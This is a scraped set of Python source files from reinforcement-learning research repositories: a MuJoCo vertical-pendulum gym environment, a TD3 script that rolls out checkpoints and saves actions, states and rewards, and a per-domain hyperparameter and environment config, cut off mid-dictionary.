cl = data[i][3]
v = data[i][4]
writer.writerow( [date, op,hi , lo,cl, v])
start_m=start_m+interval_unit
if(start_m==60):
start_m=0
start_h=(start_h+1)
if(start_h==24):
start_h=0
today_date= today_date+ timedelta(1)
idx += 1
if idx % 100 == 0:
time.sleep(1)
``` |
{
"source": "JiazhengChai/spinningup_pytorch",
"score": 2
} |
#### File: spinningup_pytorch/assets/vertical_mvt_pendulum.py
```python
import numpy as np
from gym import utils
from gym.envs.mujoco import mujoco_env
import os
TARGET_ENERGY=3
class VerticalMvtPendulumEnv(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,type='vertical_mvt_pendulum.xml',path=None,target_energy=TARGET_ENERGY):
self.target_energy=target_energy
self.before_init=True
if path:
mujoco_env.MujocoEnv.__init__(self, os.path.join(path,type), 2)
else:
try:
mujoco_env.MujocoEnv.__init__(self, 'vertical_mvt_pendulum.xml', 2)
except:
print('Error.')
print('Please specify the folder in which the '+type+ ' can be found.')
exit()
utils.EzPickle.__init__(self)
self.before_init =False
def step(self, action):
z_before=self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
z_after = self.sim.data.qpos[0]
ob = self._get_obs()
a_energy_penalty=np.squeeze(np.abs(z_after-z_before)*np.abs(action))
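# The reward below tracks a target pendulum energy: stick_energy combines a
# (signed) rotational kinetic term in ob[4] (the pole's angular velocity) with
# a potential term 4.905 * (1 - cos(theta)); the constants 0.0417 and 4.905
# presumably encode the pole's inertia and m*g*l_com (assumption, not verified
# against the MuJoCo model).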
stick_energy=np.abs(0.0417*ob[4])*ob[4]+4.905*(1-ob[2])
alive_bonus = 10
r = -(self.target_energy - stick_energy)**2 + alive_bonus - 0.01 * ob[0]**2 - 0.01 * a_energy_penalty
if self.before_init:
done = bool(ob[2] < 0)
else:
done = bool(ob[2] < 0 or np.abs(ob[4])<0.0001)
#done=False
return ob, r, done, {'actuator penalty':a_energy_penalty,'stick energy':stick_energy,'delta target energy':np.abs(self.target_energy-stick_energy)}
def _get_obs(self):
return np.concatenate([
self.sim.data.qpos[:1], # cart x pos
np.sin(self.sim.data.qpos[1:]), # link angles
np.cos(self.sim.data.qpos[1:]),
np.clip(self.sim.data.qvel, -10, 10),
np.clip(self.sim.data.qfrc_constraint, -10, 10)
]).ravel()
def reset_model(self):
self.set_state(
self.init_qpos + self.np_random.uniform(low=-.1, high=.1, size=self.model.nq),
self.init_qvel + self.np_random.randn(self.model.nv) * .1
)
return self._get_obs()
def viewer_setup(self):
v = self.viewer
v.cam.trackbodyid = 0
v.cam.distance = self.model.stat.extent * 0.3
v.cam.lookat[0] = 0
v.cam.lookat[1] = -1
v.cam.lookat[2] = 0
v.cam.elevation = 0
``` |
{
"source": "JiazhengChai/synergy_analysis",
"score": 2
} |
#### File: examples/development_TD3/collect_actions_TD3.py
```python
import argparse
from distutils.util import strtobool
import json
import os
import pickle
from collections import OrderedDict
import tensorflow as tf
import numpy as np
from softlearning.policies.utils import get_policy_from_variant
from softlearning.samplers import rollouts,my_rollouts
speed_dict={
"v1":0.5,
"v2":1,
"v25": 1,
"v3":2,
"v4":3,
"v45": 3,
"v5":4,
"v6":5,
"v65": 5,
}
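# Maps environment version suffixes (e.g. "v3") to target speeds; for the
# FullCheetahHeavy speed variants below, speed * episode length is added back
# to the collected rewards.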
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--agent',
type=str)
parser.add_argument('--path',
type=str, default=None)
parser.add_argument('--base_path',
type=str, default=None)
parser.add_argument('--tr',
default='all',
type=str,
nargs='+')
parser.add_argument('--energy',
type=str, default='Energy0-v0',
choices=['Energy0-v0','EnergyOne-v0','Energyz-v0',
'EnergyPoint5-v0','EnergyPoint1-v0',
'EnergyPoint25-v0','EnergyAlt-v0','smallRange-v0',
'bigRange-v0','Symloss-v0','Symdup-v0','SymlossGfblr-v0',
'SymdupGfblr-v0','SymlossG-v0','SymdupG-v0',
'SymlossT-v0','SymdupT-v0',
'Energy0-v1','Energy0-v2','Energy0-v3','Energy0-v4','Energy0-v5','Energy0-v6','Energy0-v7','Energy0-v8',
'Energy0-v9',
'SymlossT-v1','SymlossT-v2','SymlossT-v3','SymlossT-v4','SymlossT-v5','SymlossT-v6',
'SymlossG-v1','SymlossG-v2','SymlossG-v3','SymlossG-v4','SymlossG-v5','SymlossG-v6',
'LessSpring-v0','LessSpring-v2','LessSpring-v4','LessSpring-v6',
'MoreSpring-v0','MoreSpring-v2','MoreSpring-v4','MoreSpring-v6',
'ExSpring-v0', 'ExSpring-v2', 'ExSpring-v4','ExSpring-v6',
'MinSpring-v0', 'MinSpring-v2', 'MinSpring-v4', 'MinSpring-v6',
'ExSpring-v00', 'ExSpring-v45','ExSpring-v65',
'MinSpring-v00', 'MinSpring-v45', 'MinSpring-v65',
'Energy0-v00','Energy0-v45','Energy0-v65',
'MinSpringG-v0','MinSpringG-v2', 'MinSpringG-v4', 'MinSpringG-v6',
'MinSpringT-v0', 'MinSpringT-v2', 'MinSpringT-v4','MinSpringT-v6',
'ExSpringT-v0', 'ExSpringT-v2', 'ExSpringT-v4', 'ExSpringT-v6',
'ExSpringG-v0', 'ExSpringG-v2', 'ExSpringG-v4', 'ExSpringG-v6',
])
parser.add_argument('--start', '-s', type=int,default=100)
parser.add_argument('--final', '-f', type=int,default=3000)
parser.add_argument('--step', '-st', type=int,default=100)
parser.add_argument('--gpu_choice', type=int, default=0)
parser.add_argument('--max-path-length', '-l', type=int, default=1000)
parser.add_argument('--num-rollouts', '-n', type=int, default=10)
parser.add_argument('--render-mode', '-r',
type=str,
default=None,
choices=('human', 'rgb_array', None),
help="Mode to render the rollouts in.")
parser.add_argument('--deterministic', '-d',
type=lambda x: bool(strtobool(x)),
nargs='?',
const=True,
default=True,
help="Evaluate policy deterministically.")
parser.add_argument('--name',
type=str,
help='Experiment name')
args = parser.parse_args()
return args
def simulate_policy(args):
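# Restore a pickled checkpoint (env + policy weights), rebuild the policy from
# the saved variant params, and roll it out for --num-rollouts episodes,
# deterministically by default.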
if args.gpu_choice is not None:
os.environ["CUDA_VISIBLE_DEVICES"] = str(args.gpu_choice)
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
checkpoint_path = args.checkpoint_path.rstrip('/')
experiment_path = os.path.dirname(checkpoint_path)
variant_path = os.path.join(experiment_path, 'params.json')
with open(variant_path, 'r') as f:
variant = json.load(f)
pickle_path = os.path.join(checkpoint_path, 'checkpoint.pkl')
print(pickle_path)
print(os.getcwd())
with open(pickle_path, 'rb') as f:
picklable = pickle.load(f)
env = picklable['env']
policy = (
get_policy_from_variant(variant, env))
policy.set_weights(picklable['policy_weights'])
with policy.set_deterministic (args.deterministic):
paths = my_rollouts(env=env,
policy=policy,
path_length=args.max_path_length,
n_paths=args.num_rollouts,
render_mode=args.render_mode)
return paths
if __name__ == '__main__':
args = parse_args()
if not args.path:
agent=args.agent
energy=args.energy
if args.base_path:
top_path=os.path.join(args.base_path,agent+'/'+energy)
else:
top_path='./experiments_results/gym/'+agent+'/'+energy
print(top_path)
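# Map the energy/reward variant name to the suffix used in the saved .npy file
# names (e.g. 'Energy0-v0' -> '_E0_TD3'), appending the version when it is not 'v0'.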
if 'Energy0' in energy:
ene_sub='_E0_TD3'
elif 'EnergyOne' in energy:
ene_sub = '_E1_TD3'
elif 'EnergyPoint5' in energy:
ene_sub = '_Ep5_TD3'
elif 'Energyz' in energy:
ene_sub = '_Ez_TD3'
elif 'EnergyPoint1' in energy:
ene_sub = '_Ep1_TD3'
elif 'EnergyPoint25' in energy:
ene_sub = '_Ep25_TD3'
elif 'EnergyAlt' in energy:
ene_sub = '_Ealt_TD3'
elif 'smallRange' in energy:
ene_sub = '_sR_TD3'
elif 'bigRange' in energy:
ene_sub = '_bR_TD3'
elif 'LessSpring' in energy:
ene_sub = '_lS_TD3'
elif 'MoreSpring' in energy:
ene_sub = '_mS_TD3'
elif 'ExSpring' in energy:
if "T" in energy:
ene_sub = '_maxST_TD3'
elif "G" in energy:
ene_sub = '_maxSG_TD3'
else:
ene_sub = '_maxS_TD3'
elif 'MinSpring' in energy:
if "T" in energy:
ene_sub = '_minST_TD3'
elif "G" in energy:
ene_sub = '_minSG_TD3'
else:
ene_sub = '_minS_TD3'
version = energy.split("-")[1]
if version != "v0":
ene_sub = ene_sub + version
if agent=='HalfCheetah':
abrv='HC'
elif 'HalfCheetahSquat' in agent and 'dof' in agent:
abrv='HCsquat'
tmp_agent_name=agent.replace('HalfCheetahSquat', '')
abrv+=tmp_agent_name
elif 'HalfCheetah' in agent and 'dof' in agent:
abrv = 'HC'
tmp_agent_name = agent.replace('HalfCheetah', '')
abrv += tmp_agent_name
elif agent=='HalfCheetahHeavy':
abrv = 'HCheavy'
elif agent=='FullCheetah':
abrv = 'FC'
elif agent == 'FullCheetahHeavy':
abrv = 'FCheavy'
else:
abrv = agent
for experiment in os.listdir(top_path):
exp_path=os.path.join(top_path,experiment)
if 'TD3' in experiment:
base_name=abrv+ene_sub
trial='_'+experiment.split('_')[-1]
extract_b = True
if 'all' not in args.tr and trial not in args.tr:
extract_b = False
if extract_b:
for folder in os.listdir(exp_path):
if 'ExperimentRunner' in folder:
base_path=os.path.join(exp_path,folder)
start=args.start
step=args.step
final=args.final
all_checkpoint = []
all_name =[]
for ch in range(start,final+1,step):
specific='checkpoint_'+str(ch)
all_checkpoint.append(os.path.join(base_path, specific))
namee = base_name + '_C' + str(ch) + trial
all_name.append(namee)
for ind,chk in enumerate(all_checkpoint):
args.checkpoint_path=chk
args.name=all_name[ind]
paths=simulate_policy(args)
total_ori_reward = []
total_energy = []
total_pure_reward = []
action_list=[]
states_list = []
for path in paths:
try:
tmp = 0
tmpe=0
tmpPure=0
for i in range(len(path['infos'])):
tmp = tmp + path['infos'][i]['ori_reward']
tmpe = tmpe + path['infos'][i]['energy']
if "HalfCheetah" in agent or "FullCheetah" in agent :
if "Squat" in agent:
tmpPure=tmpPure + path['infos'][i]['reward_dist']
else:
tmpPure=tmpPure + path['infos'][i]['reward_run']
elif "Ant" in agent:
if "SquaT" in agent:
tmpPure = tmpPure + path['infos'][i]['reward_distance']
elif "Run" in agent:
tmpPure = tmpPure + path['infos'][i]['reward_forward']
elif "VA" in agent:
tmpPure = tmpPure + path['infos'][i]['reward_dist']/5
elif "RealArm" in agent:
tmpPure = tmpPure + path['infos'][i]['reward_dist']/5
if agent=="FullCheetahHeavy" and "v0" not in energy:
speed=speed_dict[version]
print("Speed: ",speed)
tmp=tmp+len(path['infos'])*speed
tmpPure=tmpPure+len(path['infos'])*speed
total_ori_reward.append(tmp)
total_energy.append(tmpe)
total_pure_reward.append(tmpPure)
except:
pass
path_action=path['actions']
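# For FullCheetahHeavy, mirrored leg actions are reconstructed: the trot branch
# negates the front-leg actions onto the hind legs and the gallop branch copies
# them. Note that the 'T'/'G' membership tests below also match the '_TD3'
# suffix, so the trot branch runs for every FullCheetahHeavy variant.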
if agent == 'FullCheetahHeavy' :
if 'T' in ene_sub:
print("trot")
path_action=np.asarray(path_action)
path_action[:,6:9] = -1 * path_action[:,0:3]
path_action[:,9:12] = -1 * path_action[:,3:6]
elif 'G' in ene_sub :
print("gallop")
path_action=np.asarray(path_action)
path_action[:,6:12] = path_action[:,0:6]
action_list.append(path_action)
states_list.append(path['states'])
action_list=np.asarray(action_list)
states_list = np.asarray(states_list)
name = args.name
print(name)
total_energy = np.asarray(total_energy)
if not os.path.exists('./experiments_results/collected_actions/trajectory_npy/reward_energy_dict'):
os.makedirs('./experiments_results/collected_actions/trajectory_npy/reward_energy_dict',exist_ok=True)
if not os.path.exists('./experiments_results/collected_actions/trajectory_npy/actions_npy'):
os.makedirs('./experiments_results/collected_actions/trajectory_npy/actions_npy',exist_ok=True)
if not os.path.exists('./experiments_results/collected_actions/trajectory_npy/states_npy'):
os.makedirs('./experiments_results/collected_actions/trajectory_npy/states_npy',exist_ok=True)
if not os.path.exists(
'./experiments_results/collected_actions/trajectory_npy/pure_reward_dict'):
os.makedirs('./experiments_results/collected_actions/trajectory_npy/pure_reward_dict',
exist_ok=True)
try:
diagnostics = OrderedDict((
('ori-return-average', np.mean(total_ori_reward)),
('ori-return-min', np.min(total_ori_reward)),
('ori-return-max', np.max(total_ori_reward)),
('ori-return-std', np.std(total_ori_reward)),
('total-energy-average', np.mean(total_energy)),
('total-energy-min', np.min(total_energy)),
('total-energy-max', np.max(total_energy)),
('total-energy-std', np.std(total_energy)),
))
np.save('./experiments_results/collected_actions/trajectory_npy/reward_energy_dict/' + name, diagnostics)
except:
print("error in reward energy dict saving")
pass
try:
diagnostics = OrderedDict((
('pure-return-average', np.mean(total_pure_reward)),
('pure-return-std', np.std(total_pure_reward)),
))
np.save('./experiments_results/collected_actions/trajectory_npy/pure_reward_dict/' + name, diagnostics)
except:
pass
np.save('./experiments_results/collected_actions/trajectory_npy/actions_npy/' + name, action_list)
np.save('./experiments_results/collected_actions/trajectory_npy/states_npy/' + name, states_list)
else:
base_path = args.path
#base_name = abrv + ene_sub
trial = '_' + base_path.split('/')[-2].split('-')[-1].split('_')[-1]
base_name = base_path.split('/')[-2].split('-')[-1].replace(trial,'')
start = args.start
step = args.step
final = args.final
all_checkpoint = []
all_name = []
for ch in range(start, final + 1, step):
specific = 'checkpoint_' + str(ch)
all_checkpoint.append(os.path.join(base_path, specific))
namee = base_name + '_C' + str(ch) + trial
all_name.append(namee)
for ind, chk in enumerate(all_checkpoint):
args.checkpoint_path = chk
args.name = all_name[ind]
paths = simulate_policy(args)
total_ori_reward = []
total_energy = []
action_list = []
states_list = []
for path in paths:
try:
tmp = 0
tmpe = 0
for i in range(len(path['infos'])):
tmp = tmp + path['infos'][i]['ori_reward']
tmpe = tmpe + path['infos'][i]['energy']
total_ori_reward.append(tmp)
total_energy.append(tmpe)
except:
pass
action_list.append(path['actions'])
states_list.append(path['states'])
action_list = np.asarray(action_list)
states_list = np.asarray(states_list)
name = args.name
print(name)
total_energy = np.asarray(total_energy)
if not os.path.exists('./experiments_results/collected_actions/trajectory_npy/reward_energy_dict'):
os.makedirs('./experiments_results/collected_actions/trajectory_npy/reward_energy_dict', exist_ok=True)
if not os.path.exists('./experiments_results/collected_actions/trajectory_npy/actions_npy'):
os.makedirs('./experiments_results/collected_actions/trajectory_npy/actions_npy', exist_ok=True)
if not os.path.exists('./experiments_results/collected_actions/trajectory_npy/states_npy'):
os.makedirs('./experiments_results/collected_actions/trajectory_npy/states_npy', exist_ok=True)
try:
diagnostics = OrderedDict((
('ori-return-average', np.mean(total_ori_reward)),
('ori-return-min', np.min(total_ori_reward)),
('ori-return-max', np.max(total_ori_reward)),
('ori-return-std', np.std(total_ori_reward)),
('total-energy-average', np.mean(total_energy)),
('total-energy-min', np.min(total_energy)),
('total-energy-max', np.max(total_energy)),
('total-energy-std', np.std(total_energy)),
))
np.save('./experiments_results/collected_actions/trajectory_npy/reward_energy_dict/' + name,
diagnostics)
except:
pass
np.save('./experiments_results/collected_actions/trajectory_npy/actions_npy/' + name, action_list)
np.save('./experiments_results/collected_actions/trajectory_npy/states_npy/' + name, states_list)
```
#### File: examples/development/variants.py
```python
from ray import tune
import numpy as np
from softlearning.misc.utils import deep_update
M = 256
N = 128#256
#N=45#human
REPARAMETERIZE = True
NUM_COUPLING_LAYERS = 2
GAUSSIAN_POLICY_PARAMS_BASE = {
'type': 'GaussianPolicy',
'kwargs': {
'hidden_layer_sizes': (M, M),
'squash': True,
}
}
DETERMINISTICS_POLICY_PARAMS_BASE = {
'type': 'DeterministicsPolicy',
'kwargs': {
'hidden_layer_sizes': (M, M),
'squash': True
}
}
GAUSSIAN_POLICY_PARAMS_FOR_DOMAIN = {}
DETERMINISTICS_POLICY_PARAMS_FOR_DOMAIN = {}
POLICY_PARAMS_BASE = {
'GaussianPolicy': GAUSSIAN_POLICY_PARAMS_BASE,
'DeterministicsPolicy': DETERMINISTICS_POLICY_PARAMS_BASE,
}
POLICY_PARAMS_BASE.update({
'gaussian': POLICY_PARAMS_BASE['GaussianPolicy'],
'deterministicsPolicy': POLICY_PARAMS_BASE['DeterministicsPolicy'],
})
POLICY_PARAMS_FOR_DOMAIN = {
'GaussianPolicy': GAUSSIAN_POLICY_PARAMS_FOR_DOMAIN,
'DeterministicsPolicy': DETERMINISTICS_POLICY_PARAMS_FOR_DOMAIN,
}
POLICY_PARAMS_FOR_DOMAIN.update({
'gaussian': POLICY_PARAMS_FOR_DOMAIN['GaussianPolicy'],
'deterministicsPolicy': POLICY_PARAMS_FOR_DOMAIN['DeterministicsPolicy'],
})
DEFAULT_MAX_PATH_LENGTH = 1000
MAX_PATH_LENGTH_PER_DOMAIN = {
'Point2DEnv': 50,
'Pendulum': 200,
}
ALGORITHM_PARAMS_BASE = {
'type': 'SAC',
'kwargs': {
'epoch_length': 1000,
'train_every_n_steps': 1,
'n_train_repeat': 1,
'eval_render_mode': None,
'eval_n_episodes': 3,
'eval_deterministic': True,
'discount': 0.99,
'tau': 5e-3,
'reward_scale': 1.0,
}
}
ALGORITHM_PARAMS_ADDITIONAL = {
'SAC': {
'type': 'SAC',
'kwargs': {
'reparameterize': REPARAMETERIZE,
'lr': 3e-4,
'target_update_interval': 1,
'tau': 5e-3,
'target_entropy': 'auto',
'store_extra_policy_info': False,
'action_prior': 'uniform',
'n_initial_exploration_steps': int(1e3),
}
},
'TD3': {
'type': 'TD3',
'kwargs': {
'reparameterize': REPARAMETERIZE,
'lr': 1e-3,
'target_update_interval': 2,
'tau': 5e-3,
'store_extra_policy_info': False,
'action_prior': 'uniform',
'n_initial_exploration_steps': int(1e4),
}
},
}
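# Per-algorithm overrides; these are presumably merged over ALGORITHM_PARAMS_BASE
# (e.g. via the deep_update helper imported above) when the variant spec is built.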
DEFAULT_NUM_EPOCHS = 200
NUM_EPOCHS_PER_DOMAIN = {
'Swimmer': int(3e2),
'Hopper': int(1e3),
'HalfCheetah': int(3e3),
'Giraffe': int(2e3),
'HalfCheetahHeavy':int(3e3),
'HalfCheetah5dof': int(3e3),
'HalfCheetah5dofv2': int(3e3),
'HalfCheetah5dofv3': int(3e3),
'HalfCheetah5dofv4': int(3e3),
'HalfCheetah5dofv5': int(3e3),
'HalfCheetah5dofv6': int(3e3),
'HalfCheetah4dof':int(3e3),
'HalfCheetah4dofv2': int(3e3),
'HalfCheetah4dofv3': int(3e3),
'HalfCheetah4dofv4': int(3e3),
'HalfCheetah4dofv5': int(3e3),
'HalfCheetah4dofv6': int(3e3),
'HalfCheetah2dof':int(3e3),
'HalfCheetah2dofv2': int(3e3),
'HalfCheetah2dofv3': int(3e3),
'HalfCheetah2dofv4': int(3e3),
'HalfCheetah2dofv5': int(3e3),
'HalfCheetah3doff': int(3e3),
'HalfCheetah3dofb': int(3e3),
'HalfCheetah3dofv3': int(3e3),
'HalfCheetah3dofv4': int(3e3),
'HalfCheetahSquat2dof': int(60),
'HalfCheetahSquat4dof': int(90),
'HalfCheetahSquat6dof': int(120),
'FullCheetah':int(3e3),
'FullCheetahHeavy': int(3e3),
'Centripede':int(2e3),
'Walker2d': int(1e3),
'Bipedal2d':int(300),
'Ant': int(2e3),
'AntSquaTRedundant': int(500),
'AntSquaT': int(500),
'AntRun': int(300),
'VA': int(30),
'VA4dof': int(30),
'VA6dof': int(30),
'VA8dof': int(100),
'RealArm7dof':int(90),
'RealArm6dof': int(90),
'RealArm5dof': int(60),
'RealArm4dof': int(60),
'RealArm5dofLT': int(60),
'RealArm4dofLT': int(60),
'RealArm5dofMinE': int(60),
'RealArm4dofMinE': int(60),
'RealArm3dof': int(30),
'AntHeavy': int(2e3),
'Humanoid': int(5e3),#int(1e4),
'Humanoidrllab': int(3e3),#int(1e4),
'Pusher2d': int(2e3),
'HandManipulatePen': int(1e4),
'HandManipulateEgg': int(1e4),
'HandManipulateBlock': int(1e4),
'HandReach': int(1e4),
'Point2DEnv': int(200),
'Reacher': int(200),
'Pendulum': 10,
'VMP': 50,
}
ALGORITHM_PARAMS_PER_DOMAIN = {
**{
domain: {
'kwargs': {
'n_epochs': NUM_EPOCHS_PER_DOMAIN.get(
domain, DEFAULT_NUM_EPOCHS),
'n_initial_exploration_steps': (
MAX_PATH_LENGTH_PER_DOMAIN.get(
domain, DEFAULT_MAX_PATH_LENGTH
) * 10),
}
} for domain in NUM_EPOCHS_PER_DOMAIN
}
}
ENV_PARAMS = {
'Bipedal2d': { # 6 DoF
'Energy0-v0': {
'target_energy':3
},
},
'VA': { # 6 DoF
'Energyz-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.0,
},
'Energy0-v0': {
'distance_reward_weight':5.0,
'ctrl_cost_weight':0.05,
},
'EnergyPoint5-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.5,
},
'EnergyOne-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight':1,
},
'smallRange-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
'xml_file':'vertical_arm_smallRange.xml'
},
'bigRange-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
'xml_file':'vertical_arm_bigRange.xml'
},
},
'VA4dof': { # 6 DoF
'Energyz-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.0,
},
'Energy0-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
},
'EnergyPoint5-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.5,
},
'EnergyOne-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 1,
},
'smallRange-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
'xml_file': 'vertical_arm4dof_smallRange.xml'
},
'bigRange-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
'xml_file': 'vertical_arm4dof_bigRange.xml'
},
},
'VA6dof': { # 6 DoF
'Energyz-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.0,
},
'Energy0-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
},
'EnergyPoint5-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.5,
},
'EnergyOne-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 1,
},
'smallRange-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
'xml_file': 'vertical_arm6dof_smallRange.xml'
},
'bigRange-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
'xml_file': 'vertical_arm6dof_bigRange.xml'
},
},
'VA8dof': { # 6 DoF
'Energyz-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.0,
},
'Energy0-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,#0.05
},
'EnergyPoint5-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.5,
},
'EnergyOne-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 1,
},
'smallRange-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
'xml_file': 'vertical_arm8dof_smallRange.xml'
},
'bigRange-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
'xml_file': 'vertical_arm8dof_bigRange.xml'
},
},
'RealArm7dof': { # 6 DoF
'Energy0-v0': {
'distance_reward_weight':5,
'shoulder_cost_weight':1,
'wrist_cost_weight':0
},
'Energy0-v1': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx':0.01
},
'Energy0-v2': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.1
},
'Energy0-v3': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.2
},
'Energy0-v9': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.15
},
'Energy0-v4': {
'xml_file': 'real_arm7dofLessTorque.xml',
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
'Energy0-v5': {
'xml_file': 'real_arm7dofMinTorque.xml',
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
'Energy0-v6': {
'xml_file': 'real_arm7dofMoreWeight.xml',
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
'Energy0-v7': {
'xml_file': 'real_arm7dof1p5Weight.xml',
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
'Energy0-v8': {
'xml_file': 'real_arm7dof2p5Weight.xml',
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
},
'RealArm6dof': { # 6 DoF
'Energy0-v0': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
'Energy0-v1': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.01
},
'Energy0-v2': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.1
},
},
'RealArm5dof': { # 6 DoF
'Energy0-v0': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
'Energy0-v1': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.01
},
'Energy0-v2': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.1
},
},
'RealArm5dofMinE': { # 6 DoF
'Energy0-v0': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'MinE_cost_weight': 0.5,
},
},
'RealArm4dofMinE': { # 6 DoF
'Energy0-v0': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'MinE_cost_weight': 0.5,
},
},
'RealArm5dofLT': { # 6 DoF
'Energy0-v0': {
'xml_file': 'real_arm5dofLessTorque.xml',
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
},
'RealArm4dofLT': { # 6 DoF
'Energy0-v0': {
'xml_file': 'real_arm4dofLessTorque.xml',
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
},
'RealArm4dof': { # 6 DoF
'Energy0-v0': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
'Energy0-v1': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.01
},
'Energy0-v2': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.1
},
},
'RealArm3dof': { # 6 DoF
'Energy0-v0': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
'Energy0-v1': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.01
},
'Energy0-v2': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.1
},
},
'Walker2d': { # 6 DoF
'Symloss-v0': {
},
'Symdup-v0': {
},
},
'HalfCheetahHeavy': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':0,
},
},
'HalfCheetah5dof': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
'HalfCheetah5dofv2': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
},
'HalfCheetah5dofv3': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
},
'HalfCheetah5dofv4': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
},
    'HalfCheetah5dofv5': { # 5 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
},
    'HalfCheetah5dofv6': { # 5 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
},
    'HalfCheetah4dof': { # 4 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
    'HalfCheetah4dofv2': { # 4 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
    'HalfCheetah4dofv3': { # 4 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
